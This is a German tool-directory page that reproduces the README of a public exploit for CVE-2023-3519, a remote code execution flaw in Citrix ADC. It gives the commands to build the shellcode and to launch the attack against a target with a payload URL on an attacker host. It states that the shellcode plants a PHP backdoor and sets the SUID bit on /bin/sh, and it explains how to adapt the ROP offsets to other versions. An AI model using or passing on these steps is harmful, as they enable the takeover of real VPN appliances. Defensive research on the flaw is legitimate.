Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-3519 | Kitploit
Tools/GitHubGitHub/passwa11/cve-2023-3519
SchwachstellenanalyseExploitationShellcodeWebanwendungs-ExploitationRemote-Access-ToolPayload-Entwicklung
GitHubpasswa11/cve-2023-3519

CVE-2023-3519

Repository anzeigen
11vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Citrix ADC RCE CVE-2023-3519

Dieser Exploit verwendet Adressen und Shellcode für Citrix VPX 13.1-48.47. Für den vollständigen Bericht klicken Sie hier.

Verwendung

NASM ist erforderlich, um den Shellcode zu erstellen.

root@kitploit:~
$ sudo apt install nasm

Der enthaltene Shellcode lädt ein Shell-Skript von einem entfernten http(s)-Server herunter und führt es aus. Das Skript akzeptiert 3 Argumente: den Zielhost, den Zielport und die URL eines Shell-Skript-Payloads. Ein Beispiel-Payload, der id und uname -a ausführt, bevor er sich selbst bereinigt, ist in diesem Repository enthalten.

root@kitploit:~
$ echo 'id' > a
$ python3 -m http.server &
$ python3 cve-2023-3519.py victim.com 443 attack.er:8000/a

Die URL muss kurz genug sein, um in den Shellcode-Puffer zu passen, und Sie erhalten eine Warnung, wenn sie zu lang ist.

Shellcode-Artefakte

Der Shellcode erstellt eine PHP-Backdoor in /var/netscaler/logon/a.php und setzt das SUID-Bit auf /bin/sh. Der enthaltene sh-Payload zeigt ein Beispiel für die automatische Bereinigung dieser Artefakte. Beachten Sie außerdem, dass der Shellcode seine Dateideskriptoren nicht schließt; übermäßige wiederholte Ausnutzung kann daher zu einer Erschöpfung der Ressourcen führen.

Anpassung an andere Versionen

Für FreeBSD-basierte Citrix-Ziele müssen Sie nur 3 Werte ermitteln: den Offset des gespeicherten Rückgabepointers, ein jmp rsp-ROP-Gadget (oder etwas Gleichwertiges wie push rsp; ret;) und die Adresse, zu der gesprungen werden muss, um einen Absturz zu vermeiden. Diese Parameter sind alle nahe dem Anfang von cve-2023-3519.py hartcodiert.

Tool herunterladen